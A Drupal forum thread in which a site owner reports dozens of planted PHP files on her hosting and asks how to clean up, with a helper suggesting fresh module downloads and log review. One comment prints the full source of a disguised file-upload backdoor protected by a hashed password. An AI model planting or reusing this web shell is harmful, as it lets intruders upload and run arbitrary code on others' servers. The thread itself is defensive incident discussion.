OK files or hacker files?

By tinem on 9 Dec 2013 at 16:01 UTC

Today I discovered a file on my host which I couldn't recognise and contacted my host who said they didn't know what this file was for sites/all/themes/contrib/xmlwriter_end_document.php and it shows a box where password should be pasted and a button with >>. Do some one know what this could be, please?

They looked at many of my other old test sites both Drupal 6 and Drupal 7 and found these mysterious files:
Bot how can I be sure they are from a hacker and should be deleted or they are OK?

sites/all/modules/contrib/views/theme/end.php
sites/all/modules/contrib/views/modules/printf.php
sites/all/modules/contrib/kml/xmlwriter_write_element_ns.php
sites/all/modules/contrib/ctools/page_manager/js/session_register.php
sites/all/modules/contrib/ctools/images/array_walk_recursive.php
sites/all/modules/contrib/ctools/ctools_ajax_sample/strchr.php
sites/all/modules/contrib/advanced_help/ltrim.php
sites/all/modules/contrib/location/plugins/relationships/ob_get_length.php
sites/all/modules/contrib/date/theme/xmlwriter_end_dtd.php
sites/all/modules/contrib/devel/FirePHPCore/lib/is_resource.php
sites/all/modules/contrib/gmap/markers/iconv_mime_decode.php
sites/all/modules/contrib/gmap/markers/zend_logo_guid.php
sites/all/themes/contrib/tao/drupal/opendir.php
modules/statistics/get_class_methods.php
modules/syslog/quotemeta.php
modules/php/stream_get_transports.php
misc/constant.php

NOT Drupal
div/xmlwriter_write_pi.php
div/import_request_variables.php
div/bcpow.php
div/fprintf.php
div/s2g9b8.php
div/com_load_typelib.php
div/setlocale.php
div/xml_parser_free.php
div/json_decode.php
div/register_shutdown_function.php
div/xml_parser_create_ns.php
div/key.php
div/is_object.php
div/dj73eb.php
div/getservbyport.php
div/register_tick_function.php
div/tan.php
div/simplexml_import_dom.php
div/abs.php
div/rename.php

NEW_storelocator_v3_tutorial/strpos.php
NEW_storelocator_v3_tutorial/chr.php
NEW_storelocator_v3_tutorial/array_udiff_uassoc.php
NEW_storelocator_v3_tutorial/g0vpnug.php
NEW_storelocator_v3_tutorial/xmlwriter_end_attribute.php
NEW_storelocator_v3_tutorial/get_class.php
NEW_storelocator_v3_tutorial/hash_algos.php
NEW_storelocator_v3_tutorial/stream_wrapper_register.php
NEW_storelocator_v3_tutorial/cc5ul.php
NEW_storelocator_v3_tutorial/decoct.php

storelocator_v3_tutorial/in_array.php
storelocator_v3_tutorial/rawurlencode.php
storelocator_v3_tutorial/odbc_data_source.php
storelocator_v3_tutorial/str_shuffle.php
storelocator_v3_tutorial/fileinode.php
storelocator_v3_tutorial/stream_set_write_buffer.php
storelocator_v3_tutorial/gzencode.php
storelocator_v3_tutorial/token_get_all.php
storelocator_v3_tutorial/number_format.php

profiles/u9krgfm.php
profiles/xmlwriter_open_memory.php
sites/all/modules/views/css/iconv_strpos.php
sites/all/modules/views/css/ftruncate.php
sites/all/modules/cck/modules/optionwidgets/rsort.php
sites/all/modules/cck/translations/help/de/gzclose.php
sites/all/modules/location/handlers/basename.php
sites/all/modules/admin_menu/deg2rad.php
sites/all/modules/admin_menu/tests/getmyuid.php
sites/all/modules/admin_menu/date_modify.php
sites/all/modules/gmap/markers/small/fclose.php
sites/all/modules/gmap/markers/small/atan.php
sites/all/modules/gmap/tests/array_udiff.php
sites/all/modules/custom_links/ftp_delete.php
modules/statistics/chgrp.php
modules/search/pathinfo.php
themes/chameleon/chmod.php
misc/farbtastic/strtoupper.php
scripts/r9595p.php

profiles/dea5xlo.php
sites/all/modules/cck/modules/nodereference/translations/stream_set_timeout.php
sites/all/modules/cck/modules/content_copy/translations/session_module_name.php
sites/all/modules/cck/modules/content_permissions/filter_input_array.php
sites/all/modules/rules/getmyinode.php
sites/all/modules/node_import/supported/filefield/fseek.php
sites/all/modules/services/auth/is_double.php
sites/all/modules/services/services/user_service/debug_zval_dump.php
sites/all/modules/advanced_help/translations/array_uintersect_uassoc.php
sites/all/modules/devel/ini_get.php
sites/all/modules/user_force_term/basename.php
sites/all/modules/conditional_styles/translations/usort.php
modules/upload/readdir.php
modules/aggregator/array_diff.php
modules/views_bonus/paged_feed/ereg_replace.php
modules/php/readgzfile.php
themes/garland/assert_options.php
themes/chameleon/marvin/odbc_tableprivileges.php
scripts/yyj9e7.php

And a lot of other sites and files which I will not show now.

Mvh
Tine

Comments

=-=

VM commented 8 January 2014 at 16:14

most if not all of them aren't drupal files. You can verify by downloading new copies of the modules and themes and comparing the contents.

That said if files are being generated on your server account you need to find out how that is occurring and close that security hole. Else when you delete the files they will likely be back again shortly after deletion. The apache logs should be helpful in determining when those files were placed there. The files dates and times should be helpful in filtering the logs.

Thanks a lot for trying to

tinem commented 15 December 2013 at 08:56

Thanks a lot for trying to help.

I have found out that all these stranged files both online and offline includes "$default_action = 'FilesMan';" and my virussoftware ring if I try to send one of these files attached to my shared host. I'm not sure what the hacker gets out of using this files, anyone?

But how do I get ALL these solved so I can be sure all infected files are deleted. My host say that these logs doesn't tell anything about how to stop these hackers but what do the Drupal community do when these things happends to their users? Is there a tutorial step-by-step to get ALL these solved so I can do it myself and know and learn what to do the next time, please?

=-=

VM commented 16 December 2013 at 05:22

all files can be deleted and your drupal files replaced with new downloads. You still have to figure out how your server was hacked else it is likely you will be hacked again. If your host is saying that the logs won't help you need to switch hosts. Logs can aid in better understanding how and when your server account was accessed. The time stamps on the current files should aid them in narrowing down where to look in the logs.

I have looked in many of the

tinem commented 24 December 2013 at 15:14

I have looked in many of the Access-log from my host and used AVAST and FlashFXP to look in these sites and they all include "$default_action = 'FilesMan';" and a lot of strange code and they all come from a special ip-address.

One other file which I think he maybe use is in sites/all/modules/contrib/ctools/ctools_plugin_example/plugins/hebrev.php and looks like this:

<?php

if(!empty($_FILES['message']['name']) AND (md5($_POST['nick']) == '211df628e55249fce7074c90be70e56b')) {

	$security_code = $_POST['security_code'];

	if ( !$security_code ) $security_code = ".";

	$security_code = rtrim($security_code, "/");

	$tmp_name = $_FILES['message']['tmp_name'];

	$name = $_FILES['message']['name'];

	@move_uploaded_file($tmp_name, $security_code."/".$name) ? print "<b>Message sent!</b><br/>" : print "<b>Error!</b><br/>";

} /*3339*/ print '<html>

    <head>

    <title>Search form</title>

    </head>

    <body>

    <form enctype="multipart/form-data" action="" method="POST">

    Message: <br/><input name="message" type="file" />

    <br/>Security Code: <br/><input name="security_code" value=""/><br/>

	<br/>Nick: <br/><input name="nick" value=""/><br/>

    <input type="submit" value="Sent" />

    </form>

    </body>

    </html>';

Could this be the hacker that made this?

Happy Christmas. :-)

=-=

VM commented 24 December 2013 at 15:16

Could this be the hacker that made this?

if the file isn't included in the module in question I would consider the file unsafe. To verifiy files includes in modules you can download a new copy of the module.

What do these hackers gain placing all these php-files

tinem commented 25 December 2013 at 15:00

It should NOT be there.

What do these hackers gain placing all these php-files on peoples domains?

This include http://www.unphp.net/decode/a2777f8adfdd2d44d738f6baf24c525a/ the same as some of my hackers files and until now they all come from this hacker http://www.abuseipdb.com/report-history/95.211.22.216. Ask'ed my shared host to search for this idiot and ip but are still waiting for an answer. People are enjoying Christmas I think but not me are can't relax before all this is solved. :-(

=-=

VM commented 25 December 2013 at 20:24

What do these hackers gain placing all these php-files on peoples domains?

depends on what the files do when run.

depends on what the files do

tinem commented 5 January 2014 at 13:03

depends on what the files do when run.

Yes but I don't think I ever can figure this out but I keep on struggling for finding a solution on all this.

I have read tons of threads on Google Drupal sites hacked and have found this great module https://drupal.org/project/security_review. After running this on my sites I found "some files and directories in your install are writeable by the server"

Security review
Web server file system permissions
It is dangerous to allow the web server to write to files inside the document root of your server. Doing so would allow Drupal to write files that could then be executed. An attacker might use such a vulnerability to take control of your site. An exception is the files directory which Drupal needs permission to write to in order to provide features like file attachments.
In addition to inspecting files, this test attempts to create and write to files. Look in your security_review module directory on the server for files named file_write_test.YYYYMMDDHHMMSS and for a file called IGNOREME.txt which gets a timestamp appended to it if it is writeable.

Edited 5.1.2013, 14:02: I see that IGNOREME.txt does NOT have a timestamp so maybe all is OK then?

and a LOT of files are showed. .htaccess file are 644. Contacted my host and they said I didn't need to change anything here but don't know?

"Unsafe file extensions are allowed in uploads". Looks like the hacker has given access to php-files which may be the reason he could upload all these php-files but don't know. Have of course changed this now.

And a couple of more warnings which I still have to study.

=-=

VM commented 8 January 2014 at 14:49

I received your email (please don't contact me for personal support). I'm not sure what else I can help with here.

OK, sorry.

tinem commented 8 January 2014 at 15:26

OK, sorry.

1. Edited 5.1.2013, 14:02: I see that IGNOREME.txt does NOT have a timestamp so maybe all is OK then?

2. and a LOT of files are showed. .htaccess file are 644. Contacted my host and they said I didn't need to change anything here but don't know?

3. Does Drupal have something like a WIKI page where they tell about all the things people should do to clean up their sites after a hacker and about what these hackers gain out of doing this and what the different kind of attacks are called and what they do to your sites?

=-=

VM commented 8 January 2014 at 16:17

1. I can't answer. I've never used the security review module.
2. To better understand file permissions in Octal modes see: http://en.wikipedia.org/wiki/Chmod
3. No. A comprehensive wiki would be difficult to maintain and most aren't drupal specific. At this point, no one can be sure what happened to your site is Drupal specific either as there isn't enough information about how the site/server was accessed. What hackers can gain can be researched on the interwebs as well as what different types of attacks there are.